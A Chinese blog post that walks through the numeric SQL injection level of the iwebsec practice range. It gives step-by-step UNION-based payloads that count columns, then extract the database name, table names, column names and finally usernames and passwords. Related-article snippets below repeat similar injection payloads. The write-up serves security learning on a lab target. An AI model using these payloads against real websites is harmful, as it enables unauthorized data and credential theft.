iwebsec靶场SQL注入漏洞-数字型注入

最新推荐文章于 2024-04-17 10:42:02 发布
最新推荐文章于 2024-04-17 10:42:02 发布
阅读量321 收藏 5
点赞数 2
文章标签: mysql 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56041380/article/details/129728249
版权

iwebsec靶场在线网站

http://www.iwebsec.com:81/

iwebsec靶场下载

https://pan.baidu.com/s/1ChCilzFPSedlA_Hv4NMkPA?pwd=0aib

提取码: 0aib ,导入即可。

information_schema数据库

information_schema数据库是MYSQL自带的数据库,它提供访问数据库元数据的方式。

information_schema数据库存储了SCHEMATA表,TABLES表和COLUMNS表。

group_cancat

group_concat()是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。

判断全部列

http: //127.0.0.1/sqli/01.php?id=1 order by 3

测试3列结果还是显示正常

?id=1 order by 4

当把order by 里的数字加到4列时显示

Unknown column '4' in 'order clause'

测试结果为3列

获取数据的过程

获取当前的数据库名

?id=-1 union select 1,2,(database())

这里显示数据库名为 ‘iwebsec’

获取当前数据库中的表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

我们可以看到当前数据库的表有sqli,user,users,xss

获取表中的列名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

获取到的列名为username,password,role

获取列中的数据

?id=-1 union select 1,group_concat(username),group_concat(password) from iwebsec.users

数字型注入用到的全部SQL语句

select 1,2,(database())

select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

select 1,group_concat(username),group_concat(password) from iwebsec.users

古木木木木木
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入靶场实操
m0_46104808的博客
10-27 1538
sql注入漏洞利用
SQL 数字型注入详解 + iwebsec实例
m0_50917178的博客
12-04 6328
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL 数字型注入原理二、使用步骤1.引入库2.读入数据总结 前言 本文为作者的学习笔记。其中详细记载了作者对于SQL 数字型注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsecWebgoat两个平台来进行实战。如果有不足之处,欢迎指正。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL 数字型注入原理 当输入的参数为整型时例如:ID、年龄等。如果此时存在注入漏洞
CTF学习笔记6:iwebsec-SQL注入漏洞-04-sleep注入
lifeng_dc的博客
01-22 471
目录一、解题过程(一)观察页面(二)编写脚本逐项获取数据1.获取数据库的长度(可不做)2.获取数据库(可不做)3.获取4.获取users表的列5.获取password列的数据源码分析(一)php源码关键脚本 一、解题过程 (一)观察页面 发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入 (二)编写脚本逐项获取数据 1.获取数据库的长度(可不做) #encoding=utf-8 import requests import os import time url="ht
DVWA靶场SQL注入通关详解(1),2024年最新赶紧学起来
最新发布
weixin_58134620的博客
04-17 811
接下来查询表,查询语句为:1 union select 1,table_name from information_schema.tables where table_schema=database()#。通常,SQL注入攻击的目标是Web应用程序,因为Web应用程序通常需要与数据库进行交互,并且大多数Web应用程序使用的是SQL语言。接下来判断字段数,当查询语句为1 or 1=1 order by 2时,页面能正常显示,但是当把2换成3时,页面就会报错,因此这里的字段数为2。没有进行敏感字符过滤。
风炫安全WEB安全学习第四十九节课 靶场的搭建与实战
风炫的博客
02-09 1068
靶场实战 自《网络安全法》实施以后,在互联网上未经授权的渗透测试是违法行为。缺少了实战的战场,我们现在一般用靶场来进行实战的渗透测试学习,因为这样不会影响别人网站服务的正常运行,不会影响到别人的业务。 我在这里推荐几个靶场,然后可以对靶场里面的漏洞进行针对化学习并实战。 线上靶场推荐 https://hack.zkaq.cn/ 封神台,掌控安全的线上靶场 https://www.ichunqiu.com/ I春秋,很早就出来的一个综合的靶场。 https://redtiger.labs.overthewir
CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入
lifeng_dc的博客
01-22 3265
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。 一、解题过程 用到的工具:Chrome浏览器和HackerBar插件 (一)题目概览 1.题目路径 2.HackerBar使用 3.测试结果集列数为3列 ?id=1 order by 4 4.给id传递-1再用union select查询自己想要的数据 (1)取得当前应用的数据库 ?id=-1 union sele
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2121
iwebsec靶场SQL注入篇,详细过程,全篇完结
iwebsec靶场sql注入
果粒程
02-24 941
iwebsec靶场sql注入
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
pikachu靶场SQL注入.docx
09-13
在Pikachu靶场SQL注入中,我们可以使用FireFox浏览器或BurpSuite工具来测试字符型注入,通过测试,我们可以确定注入点。 Pikachu靶场SQL注入是非常危险的一种攻击手段,Web开发者应该采取措施来防止SQL注入攻击。
sql注入靶场.zip
06-24
它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入、堆叠查询注入等。每个挑战都设计有特定的注入点,需要利用这些点来获取敏感信息,例如数据库中的用户、密码或其他...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
mysql注入-sqlilabs靶场注入
10-15
通过完成这些关卡,你可以理解不同类型的SQL注入漏洞,并学习如何检测和利用它们。 首先,我们要了解SQL注入的基本类型:错误注入、盲注、时间盲注和堆叠查询注入。错误注入是通过触发服务器错误来获取信息,而盲注...
SQL注入漏洞攻防--sql labs
mackilo的博客
12-20 8194
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB。注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
Unknown column ‘xxx‘ in ‘order clause‘
热门推荐
weixin_45759606的博客
10-21 1万+
标题 Unknown column ‘idASC’ in ‘order clause’,一种可能 根据搜索,多数人提出是查询语句的问题; 我也是各种找,最后是因为空格 ‘ ’ 的原因,代码对比如下: 错误的代码 String orderByClause = sortBy + (desc ? "DESC" : "ASC"); 正确的代码: String orderByClause = sortBy + " " +(desc ? "DESC" : "ASC"); 就是在字符串拼接的时候,漏掉空格; 也可以这
iwebsec靶场SQL注入漏洞-字符型注入
qq_56041380的博客
03-23 500
字符型注入就是注入点的数据类型是字符型。字符型注入数字型注入的区别就是字符型注入要用一对单引号引起来。
iwebsec靶场 文件上传漏洞通关笔记1-第01关 前端js过滤绕过
mooyuan的博客
12-04 1881
第01关 前端js过滤绕过1.禁用js法(1)禁用js(2)刷新页面使生效(3)上传脚本(4)开启js并刷新页面2.修改页面法1(1)右键查询元素(2)搜索关键字check(3)删除函数调用(4)上传脚本 (5)访问脚本3.bp改包法(1)分析源码(2)将脚本后缀改为jpg(3)上传info.jpg并bp抓包(4)bp中将info.jpg改为info.php并发送(5)访问脚本打开第一关靶场iwebsec 靶场漏洞库iwebsechttp://iwebsec.com:81/upload/01.php构
GET报错注入(Sqli-labs第一题详解)
Hardworking666的博客
01-06 1965
文章目录一、找注入点二、order by判断列数三、union联合注入,判断数据显示点四、爆库、爆表 一、找注入点 单引号注入题目,在参数后面加一个单引号: /?id=1' 数据库报错,单引号匹配出错,即添加的单引号成功被数据库解析,可以通过闭合id参数,插入构造的sql语句实施攻击。 二、order by判断列数 order by 1、2、3都尝试,无报错。 /?id=1' order by 4 --+ 用4的话报错:Unknown column ‘4’ in ‘order clause’ 证明..
代码执行漏洞 | iwebsec
weixin_52116519的博客
03-04 2424
call_user_func()、call_user_func_array()函数的功能是调用函数,多用在框架中动态调用函数,所以一般比较小的程序较少出现这种方式的代码执行。array_map()函数的作用是调用函数,并且除第一个参数外其他参数为数组,通常会写死第一个参数,即写死调用函数。
sqli-labs靶场练习笔记
11-09
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库、表、列的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值